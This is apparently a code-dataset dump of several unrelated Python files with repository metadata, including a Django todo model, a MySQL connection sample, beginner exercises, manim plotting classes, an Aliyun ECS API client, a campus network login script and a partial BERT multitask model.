| 25.365854 | 72 | 0.476923 | 125 | 1,040 | 3.968 | 0.256 | 0.056452 | 0.096774 | 0.199597 | 0.47379 | 0.372984 | 0.372984 | 0.372984 | 0.372984 | 0.372984 | 0 | 0.019386 | 0.404808 | 1,040 | 40 | 73 | 26 | 0.781906 | 0.356731 | 0 | 0.15 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0 | 0.1 | 0 | 0.45 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e675854ddbd73f687dc3955ba80c468d17bec3c4 | 801 | py | Python | todo/models.py | zyayoung/share-todo | 84813545f9aa3e89441c560e64e85bc799835d30 | [
"MIT"
] | null | null | null | todo/models.py | zyayoung/share-todo | 84813545f9aa3e89441c560e64e85bc799835d30 | [
"MIT"
] | null | null | null | todo/models.py | zyayoung/share-todo | 84813545f9aa3e89441c560e64e85bc799835d30 | [
"MIT"
] | null | null | null | from django.db import models
from django.contrib.auth.models import User
from django.utils import timezone
class Todo(models.Model):
time_add = models.DateTimeField(auto_now_add=True)
title = models.CharField(max_length=64)
detail = models.TextField(blank=True)
deadline = models.DateTimeField(blank=True)
user = models.ForeignKey(User, on_delete=models.CASCADE)
done = models.BooleanField(default=False)
def __str__(self):
return self.title
def seconds_left(self):
return (self.deadline - timezone.now()).total_seconds()
def state(self):
if self.done:
return 'Done'
elif self.seconds_left() > 0:
return 'Todo'
else:
return 'Exceeded'
class Meta:
ordering = ['deadline']
| 26.7 | 63 | 0.657928 | 97 | 801 | 5.309278 | 0.525773 | 0.058252 | 0.054369 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004934 | 0.240949 | 801 | 29 | 64 | 27.62069 | 0.842105 | 0 | 0 | 0 | 0 | 0 | 0.029963 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.130435 | false | 0 | 0.130435 | 0.086957 | 0.826087 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
e6774fb2431795bf70a9da58c9b195ced57c3c9e | 839 | py | Python | dev-template/src/mysql_connect_sample.py | arrowkato/pytest-CircleiCI | 2f6a1460a48bf88547538cfc72880a9c86f9ec23 | [
"MIT"
] | null | null | null | dev-template/src/mysql_connect_sample.py | arrowkato/pytest-CircleiCI | 2f6a1460a48bf88547538cfc72880a9c86f9ec23 | [
"MIT"
] | 10 | 2020-08-24T00:25:06.000Z | 2020-11-08T03:58:48.000Z | dev-template/src/mysql_connect_sample.py | arrowkato/pytest-CircleiCI | 2f6a1460a48bf88547538cfc72880a9c86f9ec23 | [
"MIT"
] | null | null | null | import mysql.connector
from mysql.connector import errorcode
config = {
'user': 'user',
'password': 'password',
'host': 'mysql_container',
'database': 'sample_db',
'port': '3306',
}
if __name__ == "__main__":
try:
conn = mysql.connector.connect(**config)
cursor = conn.cursor()
cursor.execute('select * from users')
for row in cursor.fetchall():
print("name:" + str(row[0]) + "" + "time_zone_id" + str(row[1]))
conn.close()
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
print("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
print("Database does not exist")
else:
print(err)
else:
conn.close()
| 28.931034 | 76 | 0.587604 | 99 | 839 | 4.79798 | 0.575758 | 0.117895 | 0.071579 | 0.08 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009885 | 0.27652 | 839 | 28 | 77 | 29.964286 | 0.772652 | 0 | 0 | 0.153846 | 0 | 0 | 0.220501 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.076923 | 0.076923 | 0 | 0.076923 | 0.153846 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
e677b427e6603c8fe21acf94f00727cd3ed74b7a | 920 | py | Python | Mundo 1/ex011.py | viniciusbonito/CeV-Python-Exercicios | 6182421332f6f0c0a567c3e125fdc05736fa6281 | [
"MIT"
] | null | null | null | Mundo 1/ex011.py | viniciusbonito/CeV-Python-Exercicios | 6182421332f6f0c0a567c3e125fdc05736fa6281 | [
"MIT"
] | null | null | null | Mundo 1/ex011.py | viniciusbonito/CeV-Python-Exercicios | 6182421332f6f0c0a567c3e125fdc05736fa6281 | [
"MIT"
] | null | null | null | # criar um programa que pergunte as dimensões de uma parede, calcule sua área e informe quantos litros de tinta
# seriam necessários para a pintura, após perguntar o rendimento da tinta informado na lata
print('=' * 40)
print('{:^40}'.format('Assistente de pintura'))
print('=' * 40)
altura = float(input('Informe a altura da parede em metros: '))
largura = float(input('Informe a largura da parede em metros: '))
area = altura * largura
print('\nA área total da parede é de {:.2f}m²'.format(area))
litros = float(input('\nQuantos litros contém a lata de tinta escolhida? '))
rendlata = float(input('Qual o rendimento em metros informado na lata? '))
rendlitro = rendlata / litros
print('\nSe a lata possui {:.2f}L e rende {:.2f}m²'.format(litros, rendlata))
print('então o rendimento por litro é de {:.2f}m²'.format(rendlitro))
print('\nSerão necessário {:.2f}L para pintar toda a parede'.format(area / rendlitro)) | 46 | 111 | 0.723913 | 142 | 920 | 4.690141 | 0.443662 | 0.06006 | 0.045045 | 0.054054 | 0.039039 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017834 | 0.146739 | 920 | 20 | 112 | 46 | 0.830573 | 0.216304 | 0 | 0.153846 | 0 | 0 | 0.527121 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.538462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
e677b75c2a6dcc29dc727e2cdc804229c99df35d | 591 | py | Python | Python/Mundo 3/ex088.py | henrique-tavares/Coisas | f740518b1bedec5b0ea8c12ae07a2cac21eb51ae | [
"MIT"
] | 1 | 2020-02-07T20:39:26.000Z | 2020-02-07T20:39:26.000Z | Python/Mundo 3/ex088.py | neptune076/Coisas | 85c064cc0e134465aaf6ef41acf747d47f108fc9 | [
"MIT"
] | null | null | null | Python/Mundo 3/ex088.py | neptune076/Coisas | 85c064cc0e134465aaf6ef41acf747d47f108fc9 | [
"MIT"
] | null | null | null | from random import sample
from time import sleep
jogos = list()
print('-' * 20)
print(f'{"MEGA SENA":^20}')
print('-' * 20)
while True:
n = int(input("\nQuatos jogos você quer que eu sorteie? "))
if (n > 0):
break
print('\n[ERRO] Valor fora do intervalo')
print()
print('-=' * 3, end=' ')
print(f'SORTEANDO {n} JOGOS', end=' ')
print('-=' * 3)
for i in range(n):
jogos.append(sample(range(1,61), 6))
sleep(0.6)
print(f'Jogo {i+1}: {jogos[i]}')
print('-=' * 5, end=' ')
print('< BOA SORTE >', end=' ')
print('-=' * 3, end='\n\n') | 17.909091 | 63 | 0.527919 | 88 | 591 | 3.545455 | 0.534091 | 0.102564 | 0.057692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.040089 | 0.240271 | 591 | 33 | 64 | 17.909091 | 0.654788 | 0 | 0 | 0.090909 | 0 | 0 | 0.273649 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0.545455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
e678937ffa958feedad60c6818f9966146fc7fd7 | 229 | py | Python | tests/list/list03.py | ktok07b6/polyphony | 657c5c7440520db6b4985970bd50547407693ac4 | [
"MIT"
] | 83 | 2015-11-30T09:59:13.000Z | 2021-08-03T09:12:28.000Z | tests/list/list03.py | jesseclin/polyphony | 657c5c7440520db6b4985970bd50547407693ac4 | [
"MIT"
] | 4 | 2017-02-10T01:43:11.000Z | 2020-07-14T03:52:25.000Z | tests/list/list03.py | jesseclin/polyphony | 657c5c7440520db6b4985970bd50547407693ac4 | [
"MIT"
] | 11 | 2016-11-18T14:39:15.000Z | 2021-02-23T10:05:20.000Z | from polyphony import testbench
def list03(x, y, z):
a = [1, 2, 3]
r0 = x
r1 = y
a[r0] = a[r1] + z
return a[r0]
@testbench
def test():
assert 4 == list03(0, 1 ,2)
assert 5 == list03(2, 1 ,3)
test()
| 14.3125 | 31 | 0.515284 | 41 | 229 | 2.878049 | 0.512195 | 0.20339 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.141026 | 0.318777 | 229 | 15 | 32 | 15.266667 | 0.615385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.166667 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e67abeee75de516885fc3f200a8feafafe7fd320 | 2,313 | py | Python | manimlib/mobject/functions.py | parmentelat/manim | f05f94fbf51c70591bed3092587a5db0de439738 | [
"MIT"
] | 1 | 2021-02-04T12:54:36.000Z | 2021-02-04T12:54:36.000Z | manimlib/mobject/functions.py | parmentelat/manim | f05f94fbf51c70591bed3092587a5db0de439738 | [
"MIT"
] | null | null | null | manimlib/mobject/functions.py | parmentelat/manim | f05f94fbf51c70591bed3092587a5db0de439738 | [
"MIT"
] | null | null | null | from manimlib.constants import *
from manimlib.mobject.types.vectorized_mobject import VMobject
from manimlib.utils.config_ops import digest_config
from manimlib.utils.space_ops import get_norm
class ParametricCurve(VMobject):
CONFIG = {
"t_range": [0, 1, 0.1],
"min_samples": 10,
"epsilon": 1e-8,
# TODO, automatically figure out discontinuities
"discontinuities": [],
"smoothing": True,
}
def __init__(self, t_func, t_range=None, **kwargs):
digest_config(self, kwargs)
if t_range is not None:
self.t_range[:len(t_range)] = t_range
# To be backward compatible with all the scenes specifying t_min, t_max, step_size
self.t_range = [
kwargs.get("t_min", self.t_range[0]),
kwargs.get("t_max", self.t_range[1]),
kwargs.get("step_size", self.t_range[2]),
]
self.t_func = t_func
VMobject.__init__(self, **kwargs)
def get_point_from_function(self, t):
return self.t_func(t)
def init_points(self):
t_min, t_max, step = self.t_range
jumps = np.array(self.discontinuities)
jumps = jumps[(jumps > t_min) & (jumps < t_max)]
boundary_times = [t_min, t_max, *(jumps - self.epsilon), *(jumps + self.epsilon)]
boundary_times.sort()
for t1, t2 in zip(boundary_times[0::2], boundary_times[1::2]):
t_range = [*np.arange(t1, t2, step), t2]
points = np.array([self.t_func(t) for t in t_range])
self.start_new_path(points[0])
self.add_points_as_corners(points[1:])
if self.smoothing:
self.make_smooth()
return self
class FunctionGraph(ParametricCurve):
CONFIG = {
"color": YELLOW,
"x_range": [-8, 8, 0.25],
}
def __init__(self, function, x_range=None, **kwargs):
digest_config(self, kwargs)
self.function = function
if x_range is not None:
self.x_range[:len(x_range)] = x_range
def parametric_function(t):
return [t, function(t), 0]
super().__init__(parametric_function, self.x_range, **kwargs)
def get_function(self):
return self.function
def get_point_from_function(self, x):
return self.t_func(x)
| 31.684932 | 90 | 0.609166 | 313 | 2,313 | 4.239617 | 0.28115 | 0.058779 | 0.045215 | 0.030143 | 0.165787 | 0.096458 | 0.055765 | 0 | 0 | 0 | 0 | 0.016598 | 0.270644 | 2,313 | 72 | 91 | 32.125 | 0.770006 | 0.054907 | 0 | 0.071429 | 0 | 0 | 0.036647 | 0 | 0 | 0 | 0 | 0.013889 | 0 | 1 | 0.125 | false | 0 | 0.071429 | 0.071429 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e67af792ae036b2a2bc22a1b166e10db5dcc3d7e | 9,704 | py | Python | lib/ecsmate/ecs.py | doudoudzj/ecsmate | dda508a64ef9d6979dcc83377bb007d2a0acec30 | [
"Apache-2.0"
] | null | null | null | lib/ecsmate/ecs.py | doudoudzj/ecsmate | dda508a64ef9d6979dcc83377bb007d2a0acec30 | [
"Apache-2.0"
] | null | null | null | lib/ecsmate/ecs.py | doudoudzj/ecsmate | dda508a64ef9d6979dcc83377bb007d2a0acec30 | [
"Apache-2.0"
] | null | null | null | #-*- coding: utf-8 -*-
#
# Copyright (c) 2012, ECSMate development team
# All rights reserved.
#
# ECSMate is distributed under the terms of the (new) BSD License.
# The full license can be found in 'LICENSE.txt'.
"""ECS SDK
"""
import time
import hmac
import base64
import hashlib
import urllib
import json
import inspect
from random import random
class ECS(object):
def __init__(self, AccessKeyID, AccessKeySecret, gateway='https://ecs.aliyuncs.com'):
self.AccessKeyID = AccessKeyID
self.AccessKeySecret = AccessKeySecret
self.gateway = gateway
@classmethod
def _urlencode(self, string):
return urllib.quote(string, '~')
def _sign(self, params):
paramstrings = []
for k, v in sorted(params.items()):
paramstrings.append('%s=%s' % (ECS._urlencode(k), ECS._urlencode(v)))
datastrings = [
ECS._urlencode('GET'),
ECS._urlencode('/'),
ECS._urlencode('&'.join(paramstrings)),
]
datastring = '&'.join(datastrings)
signature = hmac.new(self.AccessKeySecret+'&', datastring, hashlib.sha1).digest()
return base64.b64encode(signature)
def _http_get(self, params):
url = self.gateway + '/?'
sysparams = {
'Format': 'JSON',
'Version': '2012-09-13',
'AccessKeyID': self.AccessKeyID,
'SignatureMethod': 'HMAC-SHA1',
'Timestamp': time.strftime('%Y-%m-%dT%XZ'),
'SignatureVersion': '1.0',
'SignatureNonce': str(random()).replace('0.', ''),
}
params.update(sysparams)
params['Signature'] = self._sign(params)
params = urllib.urlencode(params)
url += params
f = urllib.urlopen(url)
data = f.read()
f.close()
return json.loads(data)
def _parse_response(self, apiname, response):
if response.has_key('Error'):
respdata = response['Error']
reqid = respdata['RequestID']
del respdata['RequestID']
return [False, respdata, reqid]
else:
respdata = response[apiname+'Response']
return [True, respdata[apiname+'Result'], respdata['ResponseMetadata']['RequestID']]
def _make_params(self, params):
params = dict((k, str(v)) for k, v in params.items() if k != 'self' and v != None)
params['Action'] = inspect.stack()[1][3]
return params
def _execute(self, params):
response = self._http_get(params)
return self._parse_response(params['Action'], response)
def CreateInstance(self, RegionCode, DiskSize, InstanceType, GroupCode, ImageCode,
MaxBandwidthIn=None, MaxBandwidthOut=None, InstanceName=None, HostName=None,
Password=None, ZoneCode=None):
params = self._make_params(locals())
return self._execute(params)
def StartInstance(self, InstanceName):
params = self._make_params(locals())
return self._execute(params)
def StopInstance(self, InstanceName, ForceStop=None):
params = self._make_params(locals())
return self._execute(params)
def RebootInstance(self, InstanceName, ForceStop=None):
params = self._make_params(locals())
return self._execute(params)
def ResetInstance(self, InstanceName, ImageCode=None, DiskType=None):
params = self._make_params(locals())
return self._execute(params)
def ResetPassword(self, InstanceName, NewPassword=None):
params = self._make_params(locals())
return self._execute(params)
def DeleteInstance(self, InstanceName):
params = self._make_params(locals())
return self._execute(params)
def DescribeInstanceStatus(self, RegionCode=None, ZoneCode=None, PageNumber=None, PageSize=None):
params = self._make_params(locals())
return self._execute(params)
def DescribeInstanceAttribute(self, InstanceName):
params = self._make_params(locals())
return self._execute(params)
def ModifyInstanceAttribute(self, InstanceName, InstanceType):
params = self._make_params(locals())
return self._execute(params)
def ModifyBandwidth(self, InstanceName, MaxBandwidthOut, MaxBandwidthIn):
params = self._make_params(locals())
return self._execute(params)
def ModifyHostName(self, InstanceName, HostName):
params = self._make_params(locals())
return self._execute(params)
def CreateDisk(self, InstanceName, Size, SnapshotCode=None):
params = self._make_params(locals())
return self._execute(params)
def DeleteDisk(self, InstanceName, DiskCode):
params = self._make_params(locals())
return self._execute(params)
def DescribeDisks(self, InstanceName):
params = self._make_params(locals())
return self._execute(params)
def DescribeImages(self, RegionCode=None, PageNumber=None, PageSize=None):
params = self._make_params(locals())
return self._execute(params)
def AllocateAddress(self, InstanceName):
params = self._make_params(locals())
return self._execute(params)
def ReleaseAddress(self, PublicIpAddress):
params = self._make_params(locals())
return self._execute(params)
def CreateSecurityGroup(self, GroupCode, RegionCode, Description):
params = self._make_params(locals())
return self._execute(params)
def AuthorizeSecurityGroup(self, GroupCode, RegionCode, IpProtocol, PortRange,
SourceGroupCode=None, SourceCidrIp=None, Policy=None, NicType=None, Priority=None):
params = self._make_params(locals())
return self._execute(params)
def DescribeSecurityGroupAttribute(self, GroupCode, RegionCode, NicType=None):
params = self._make_params(locals())
return self._execute(params)
def DescribeSecurityGroups(self, RegionCode, PageNumber=None, PageSize=None):
params = self._make_params(locals())
return self._execute(params)
def ModifySecurityGroupAttribute(self, RegionCode, GroupCode, Adjust):
params = self._make_params(locals())
return self._execute(params)
def RevokeSecurityGroup(self, GroupCode, RegionCode, IpProtocol, PortRange,
SourceGroupCode=None, SourceCidrIp=None, Policy=None, NicType=None):
params = self._make_params(locals())
return self._execute(params)
def DeleteSecurityGroup(self, GroupCode, RegionCode):
params = self._make_params(locals())
return self._execute(params)
def CreateSnapshot(self, InstanceName, DiskCode):
params = self._make_params(locals())
return self._execute(params)
def DeleteSnapshot(self, DiskCode, InstanceName, SnapshotCode):
params = self._make_params(locals())
return self._execute(params)
def CancelSnapshotRequest(self, InstanceName, SnapshotCode):
params = self._make_params(locals())
return self._execute(params)
def DescribeSnapshots(self, InstanceName, DiskCode):
params = self._make_params(locals())
return self._execute(params)
def DescribeSnapshotAttribute(self, RegionCode, SnapshotCode):
params = self._make_params(locals())
return self._execute(params)
def RollbackSnapshot(self, InstanceName, DiskCode, SnapshotCode):
params = self._make_params(locals())
return self._execute(params)
def DescribeRegions(self):
params = self._make_params(locals())
return self._execute(params)
def DescribeZones(self, RegionCode):
params = self._make_params(locals())
return self._execute(params)
if __name__ == '__main__':
import pprint
pp = pprint.PrettyPrinter(indent=4)
AccessKeyID = ''
AccessKeySecret = ''
ecs = ECS(AccessKeyID, AccessKeySecret)
if 0:
print '## Regions\n'
regions = ecs.DescribeRegions()[1]
pp.pprint(regions)
print
for region in regions['Regions']:
print '## Zones in %s\n' % region['RegionCode']
zones = ecs.DescribeZones(region['RegionCode'])
if not zones[0]:
pp.pprint(zones)
continue
zones = zones[1]
pp.pprint(zones)
print
for zone in zones['Zones']:
print '## Instances in %s\n' % zone['ZoneCode']
instances = ecs.DescribeInstanceStatus(region['RegionCode'], zone['ZoneCode'])[1]
pp.pprint(instances)
print
print
#pp.pprint(ecs.DescribeInstanceStatus(PageSize=10, PageNumber=1))
#pp.pprint(ecs.DescribeInstanceStatus('cn-hangzhou-dg-a01', 'cn-hangzhou-dg101-a'))
#pp.pprint(ecs.StartInstance('AY1209220917063704221'))
#pp.pprint(ecs.StopInstance('AY1209220917063704221'))
#pp.pprint(ecs.RebootInstance('AY1209220917063704221'))
#pp.pprint(ecs.DescribeInstanceAttribute('AY1209220917063704221'))
#pp.pprint(ecs.DescribeImages(PageSize=10, PageNumber=9))
#pp.pprint(ecs.DescribeDisks('AY1209220917063704221'))
#pp.pprint(ecs.DescribeSnapshots('AY1209220917063704221', '1006-60002839'))
| 36.344569 | 102 | 0.622424 | 941 | 9,704 | 6.27949 | 0.227418 | 0.057539 | 0.078186 | 0.111694 | 0.393975 | 0.393975 | 0.393975 | 0.393975 | 0.393975 | 0.393975 | 0 | 0.023729 | 0.266076 | 9,704 | 266 | 103 | 36.481203 | 0.805953 | 0.077597 | 0 | 0.375 | 0 | 0 | 0.041941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.010417 | 0.046875 | null | null | 0.067708 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e68358c694510e180fb49e743ec559c977aea7b6 | 1,467 | py | Python | src/HandNetwork.py | xausky/hand-network | e885003c5bb9157cd06dc3ea3aabddbb7162a0ab | [
"MIT"
] | 2 | 2017-04-18T03:31:06.000Z | 2017-06-08T10:27:59.000Z | src/HandNetwork.py | xausky/hand-network | e885003c5bb9157cd06dc3ea3aabddbb7162a0ab | [
"MIT"
] | null | null | null | src/HandNetwork.py | xausky/hand-network | e885003c5bb9157cd06dc3ea3aabddbb7162a0ab | [
"MIT"
] | null | null | null | #!/usr/bin/python3
#-*- coding: utf-8 -*-
import urllib.parse
import json
import base64
import requests
import logging
class Network():
LOGIN_URL = 'http://192.168.211.101/portal/pws?t=li'
BEAT_URL = 'http://192.168.211.101/portal/page/doHeartBeat.jsp'
COMMON_HERADERS = {
'Accept-Language': 'en-US',
'Accept': 'text/html'
}
def __init__(self, username, password):
b64Password = base64.b64encode(bytes(password,'utf8'))
self.data = {'userName': username, 'userPwd': b64Password}
def login(self):
logging.info('login:%s'%(self.data))
response = requests.post(Network.LOGIN_URL, data=self.data,
headers=Network.COMMON_HERADERS, timeout=3)
responseText = base64.b64decode(response.text + '==')
responseJson = urllib.parse.unquote(responseText.decode('utf8'))
jsonDict = json.loads(responseJson)
heartBeatCyc = jsonDict.get('heartBeatCyc')
if heartBeatCyc == None:
raise BaseException(responseJson)
logging.info('login seccuss: %s'%(responseJson))
self.heartBeatCyc = int(heartBeatCyc)
self.serialNo = jsonDict.get('serialNo')
return self.heartBeatCyc
def beat(self):
response = requests.post(Network.BEAT_URL, data={'serialNo': self.serialNo},
headers=Network.COMMON_HERADERS, timeout=3)
if response.text.find('v_failedTimes') is -1:
raise BaseException(response.text)
| 36.675 | 84 | 0.657805 | 166 | 1,467 | 5.740964 | 0.46988 | 0.044071 | 0.03148 | 0.027282 | 0.128017 | 0.128017 | 0.052466 | 0 | 0 | 0 | 0 | 0.03856 | 0.204499 | 1,467 | 39 | 85 | 37.615385 | 0.778063 | 0.025903 | 0 | 0.058824 | 0 | 0 | 0.149965 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.088235 | false | 0.088235 | 0.147059 | 0 | 0.382353 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
e6848af64f5fa82bd5d7d5132ff08186219ab513 | 15,634 | py | Python | bert_multitask_learning/model_fn.py | akashnd/bert-multitask-learning | aee5be006ef6a3feadf0c751a6f9b42c24c3fd21 | [
"Apache-2.0"
] | null | null | null | bert_multitask_learning/model_fn.py | akashnd/bert-multitask-learning | aee5be006ef6a3feadf0c751a6f9b42c24c3fd21 | [
"Apache-2.0"
] | null | null | null | bert_multitask_learning/model_fn.py | akashnd/bert-multitask-learning | aee5be006ef6a3feadf0c751a6f9b42c24c3fd21 | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: source_nbs/13_model_fn.ipynb (unless otherwise specified).
__all__ = ['variable_summaries', 'filter_loss', 'BertMultiTaskBody', 'BertMultiTaskTop', 'BertMultiTask']
# Cell
from typing import Dict, Tuple
from inspect import signature
import tensorflow as tf
import transformers
from .modeling import MultiModalBertModel
from .params import BaseParams
from .top import (Classification, MultiLabelClassification, PreTrain,
Seq2Seq, SequenceLabel, MaskLM)
from .utils import get_embedding_table_from_model, get_transformer_main_model
def variable_summaries(var, name):
"""Attach a lot of summaries to a Tensor (for TensorBoard visualization)."""
with tf.compat.v1.name_scope(name):
mean = tf.reduce_mean(input_tensor=var)
tf.compat.v1.summary.scalar('mean', mean)
with tf.compat.v1.name_scope('stddev'):
stddev = tf.sqrt(tf.reduce_mean(
input_tensor=tf.square(var - mean)))
tf.compat.v1.summary.scalar('stddev', stddev)
tf.compat.v1.summary.scalar('max', tf.reduce_max(input_tensor=var))
tf.compat.v1.summary.scalar('min', tf.reduce_min(input_tensor=var))
tf.compat.v1.summary.histogram('histogram', var)
@tf.function
def filter_loss(loss, features, problem):
if tf.reduce_mean(input_tensor=features['%s_loss_multiplier' % problem]) == 0:
return_loss = 0.0
else:
return_loss = loss
return return_loss
class BertMultiTaskBody(tf.keras.Model):
"""Model to extract bert features and dispatch corresponding rows to each problem_chunk.
for each problem chunk, we extract corresponding features
and hidden features for that problem. The reason behind this
is to save computation for downstream processing.
For example, we have a batch of two instances and they're from
problem a and b respectively:
Input:
[{'input_ids': [1,2,3], 'a_loss_multiplier': 1, 'b_loss_multiplier': 0},
{'input_ids': [4,5,6], 'a_loss_multiplier': 0, 'b_loss_multiplier': 1}]
Output:
{
'a': {'input_ids': [1,2,3], 'a_loss_multiplier': 1, 'b_loss_multiplier': 0}
'b': {'input_ids': [4,5,6], 'a_loss_multiplier': 0, 'b_loss_multiplier': 1}
}
"""
def __init__(self, params: BaseParams, name='BertMultiTaskBody'):
super(BertMultiTaskBody, self).__init__(name=name)
self.params = params
self.bert = MultiModalBertModel(params=self.params)
if self.params.custom_pooled_hidden_size:
self.custom_pooled_layer = tf.keras.layers.Dense(
self.params.custom_pooled_hidden_size, activation=tf.keras.activations.selu)
else:
self.custom_pooled_layer = None
@tf.function
def get_features_for_problem(self, features, hidden_feature, problem, mode):
# get features with ind == 1
if mode == tf.estimator.ModeKeys.PREDICT:
feature_this_round = features
hidden_feature_this_round = hidden_feature
else:
multiplier_name = '%s_loss_multiplier' % problem
record_ind = tf.where(tf.cast(
tf.squeeze(features[multiplier_name]), tf.bool))
hidden_feature_this_round = {}
for hidden_feature_name in hidden_feature:
if hidden_feature_name != 'embed_table':
hidden_feature_this_round[hidden_feature_name] = tf.squeeze(tf.gather(
hidden_feature[hidden_feature_name], record_ind, axis=0
), axis=1)
hidden_feature_this_round[hidden_feature_name].set_shape(
hidden_feature[hidden_feature_name].shape.as_list())
else:
hidden_feature_this_round[hidden_feature_name] = hidden_feature[hidden_feature_name]
feature_this_round = {}
for features_name in features:
feature_this_round[features_name] = tf.gather_nd(
features[features_name],
record_ind)
return feature_this_round, hidden_feature_this_round
def call(self, inputs: Dict[str, tf.Tensor],
mode: str) -> Tuple[Dict[str, Dict[str, tf.Tensor]], Dict[str, Dict[str, tf.Tensor]]]:
_ = self.bert(inputs, mode == tf.estimator.ModeKeys.TRAIN)
# extract bert hidden features
inputs['model_input_mask'] = self.bert.get_input_mask()
inputs['model_token_type_ids'] = self.bert.get_token_type_ids()
hidden_feature = {}
for logit_type in ['seq', 'pooled', 'all', 'embed', 'embed_table']:
if logit_type == 'seq':
# tensor, [batch_size, seq_length, hidden_size]
hidden_feature[logit_type] = self.bert.get_sequence_output()
elif logit_type == 'pooled':
# tensor, [batch_size, hidden_size]
hidden_feature[logit_type] = self.bert.get_pooled_output()
if self.custom_pooled_layer:
hidden_feature[logit_type] = self.custom_pooled_layer(
hidden_feature[logit_type])
elif logit_type == 'all':
# list, num_hidden_layers * [batch_size, seq_length, hidden_size]
hidden_feature[logit_type] = self.bert.get_all_encoder_layers()
elif logit_type == 'embed':
# for res connection
hidden_feature[logit_type] = self.bert.get_embedding_output()
elif logit_type == 'embed_table':
hidden_feature[logit_type] = self.bert.get_embedding_table()
# for each problem chunk, we extract corresponding features
# and hidden features for that problem. The reason behind this
# is to save computation for downstream processing.
# For example, we have a batch of two instances and they're from
# problem a and b respectively:
# Input:
# [{'input_ids': [1,2,3], 'a_loss_multiplier': 1, 'b_loss_multiplier': 0},
# {'input_ids': [4,5,6], 'a_loss_multiplier': 0, 'b_loss_multiplier': 1}]
# Output:
# {
# 'a': {'input_ids': [1,2,3], 'a_loss_multiplier': 1, 'b_loss_multiplier': 0}
# 'b': {'input_ids': [4,5,6], 'a_loss_multiplier': 0, 'b_loss_multiplier': 1}
# }
features = inputs
return_feature = {}
return_hidden_feature = {}
for problem_dict in self.params.run_problem_list:
for problem in problem_dict:
if self.params.task_transformer:
# hidden_feature = task_tranformer_hidden_feature[problem]
raise NotImplementedError
if len(self.params.run_problem_list) > 1:
feature_this_round, hidden_feature_this_round = self.get_features_for_problem(
features, hidden_feature, problem, mode)
else:
feature_this_round, hidden_feature_this_round = features, hidden_feature
if self.params.label_transfer and self.params.grid_transformer:
raise ValueError(
'Label Transfer and grid transformer cannot be enabled in the same time.'
)
